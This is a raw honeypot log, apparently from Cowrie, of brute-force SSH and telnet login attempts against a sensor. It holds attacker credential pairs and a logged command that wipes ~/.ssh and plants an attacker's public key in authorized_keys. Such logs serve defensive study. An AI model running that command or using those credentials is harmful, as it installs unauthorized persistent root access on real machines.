es128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:56:26.349769Z","src_ip":"212.227.235.229","session":"a8a19410257d"}
{"eventid":"cowrie.login.failed","username":"muhamad","password":"12345","message":"login attempt [muhamad/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T21:56:27.228248Z","src_ip":"212.227.235.229","session":"a8a19410257d"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:28.435397Z","src_ip":"212.227.235.229","session":"a8a19410257d"}
{"eventid":"cowrie.session.connect","src_ip":"14.169.152.26","src_port":43847,"dst_ip":"1.2.3.4","dst_port":23,"session":"478cc2fc6499","protocol":"telnet","message":"New connection: 14.169.152.26:43847 (1.2.3.4:23) [session: 478cc2fc6499]","sensor":"my-vps","timestamp":"2025-09-08T21:56:31.689792Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36444,"dst_ip":"1.2.3.4","dst_port":22,"session":"535ff7f34a53","protocol":"ssh","message":"New connection: 212.227.235.229:36444 (1.2.3.4:22) [session: 535ff7f34a53]","sensor":"my-vps","timestamp":"2025-09-08T21:56:38.876660Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:56:38.877558Z","src_ip":"212.227.235.229","session":"535ff7f34a53"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:56:39.185793Z","src_ip":"212.227.235.229","session":"535ff7f34a53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47730,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4a2e8a6526c","protocol":"ssh","message":"New connection: 212.227.235.229:47730 (1.2.3.4:22) [session: b4a2e8a6526c]","sensor":"my-vps","timestamp":"2025-09-08T21:56:39.301649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:56:39.302397Z","src_ip":"212.227.235.229","session":"b4a2e8a6526c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:56:39.479477Z","src_ip":"212.227.235.229","session":"b4a2e8a6526c"}
{"eventid":"cowrie.login.success","username":"root","password":"yy5202514","message":"login attempt [root/yy5202514] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:56:40.229907Z","src_ip":"212.227.235.229","session":"b4a2e8a6526c"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-09-08T21:56:40.459767Z","src_ip":"212.227.235.229","session":"535ff7f34a53"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:56:40.642560Z","src_ip":"212.227.235.229","session":"b4a2e8a6526c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:56:40.643281Z","src_ip":"212.227.235.229","session":"b4a2e8a6526c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:56:40.644299Z","src_ip":"212.227.235.229","session":"b4a2e8a6526c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:40.822769Z","src_ip":"212.227.235.229","session":"b4a2e8a6526c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:56:41.193746Z","src_ip":"212.227.235.229","session":"b4a2e8a6526c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:56:41.194459Z","src_ip":"212.227.235.229","session":"b4a2e8a6526c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:56:41.373382Z","src_ip":"212.227.235.229","session":"b4a2e8a6526c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:41.374377Z","src_ip":"212.227.235.229","session":"b4a2e8a6526c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47736,"dst_ip":"1.2.3.4","dst_port":22,"session":"11318cc775af","protocol":"ssh","message":"New connection: 212.227.235.229:47736 (1.2.3.4:22) [session: 11318cc775af]","sensor":"my-vps","timestamp":"2025-09-08T21:56:41.548416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:56:41.549116Z","src_ip":"212.227.235.229","session":"11318cc775af"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:56:41.725399Z","src_ip":"212.227.235.229","session":"11318cc775af"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:41.769031Z","src_ip":"212.227.235.229","session":"535ff7f34a53"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:56:42.471628Z","src_ip":"212.227.235.229","session":"11318cc775af"}
{"eventid":"cowrie.session.connect","src_ip":"103.29.69.96","src_port":38626,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7a1827e3f44","protocol":"ssh","message":"New connection: 103.29.69.96:38626 (1.2.3.4:22) [session: e7a1827e3f44]","sensor":"my-vps","timestamp":"2025-09-08T21:56:42.668171Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T21:56:42.669275Z","src_ip":"103.29.69.96","session":"e7a1827e3f44"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T21:56:42.926133Z","src_ip":"103.29.69.96","session":"e7a1827e3f44"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:43.648951Z","src_ip":"212.227.235.229","session":"11318cc775af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47752,"dst_ip":"1.2.3.4","dst_port":22,"session":"52227190525a","protocol":"ssh","message":"New connection: 212.227.235.229:47752 (1.2.3.4:22) [session: 52227190525a]","sensor":"my-vps","timestamp":"2025-09-08T21:56:43.828700Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:56:43.829310Z","src_ip":"212.227.235.229","session":"52227190525a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:56:44.037684Z","src_ip":"212.227.235.229","session":"52227190525a"}
{"eventid":"cowrie.session.closed","duration":12.801758766174316,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:44.491419Z","src_ip":"14.169.152.26","session":"478cc2fc6499"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:56:44.791883Z","src_ip":"212.227.235.229","session":"52227190525a"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:44.968712Z","src_ip":"212.227.235.229","session":"b4a2e8a6526c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:44.971546Z","src_ip":"212.227.235.229","session":"52227190525a"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:52.668759Z","src_ip":"103.29.69.96","session":"e7a1827e3f44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49826,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac21174d1d87","protocol":"ssh","message":"New connection: 212.227.235.229:49826 (1.2.3.4:22) [session: ac21174d1d87]","sensor":"my-vps","timestamp":"2025-09-08T21:57:02.784095Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:57:02.785539Z","src_ip":"212.227.235.229","session":"ac21174d1d87"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:57:03.101083Z","src_ip":"212.227.235.229","session":"ac21174d1d87"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia2025","message":"login attempt [nvidia/nvidia2025] failed","sensor":"my-vps","timestamp":"2025-09-08T21:57:04.405741Z","src_ip":"212.227.235.229","session":"ac21174d1d87"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:57:05.724465Z","src_ip":"212.227.235.229","session":"ac21174d1d87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59734,"dst_ip":"1.2.3.4","dst_port":22,"session":"388505278e67","protocol":"ssh","message":"New connection: 212.227.235.229:59734 (1.2.3.4:22) [session: 388505278e67]","sensor":"my-vps","timestamp":"2025-09-08T21:57:09.887817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:57:09.889071Z","src_ip":"212.227.235.229","session":"388505278e67"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:57:10.219714Z","src_ip":"212.227.235.229","session":"388505278e67"}
{"eventid":"cowrie.login.failed","username":"boris","password":"123","message":"login attempt [boris/123] failed","sensor":"my-vps","timestamp":"2025-09-08T21:57:11.580735Z","src_ip":"212.227.235.229","session":"388505278e67"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:57:12.912297Z","src_ip":"212.227.235.229","session":"388505278e67"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45488,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff30bf0b04a8","protocol":"ssh","message":"New connection: 212.227.235.229:45488 (1.2.3.4:22) [session: ff30bf0b04a8]","sensor":"my-vps","timestamp":"2025-09-08T21:57:16.560258Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:57:16.561026Z","src_ip":"212.227.235.229","session":"ff30bf0b04a8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:57:16.852473Z","src_ip":"212.227.235.229","session":"ff30bf0b04a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51430,"dst_ip":"1.2.3.4","dst_port":22,"session":"9367a95b883c","protocol":"ssh","message":"New connection: 212.227.235.229:51430 (1.2.3.4:22) [session: 9367a95b883c]","sensor":"my-vps","timestamp":"2025-09-08T21:57:17.228719Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:57:17.229605Z","src_ip":"212.227.235.229","session":"9367a95b883c"}
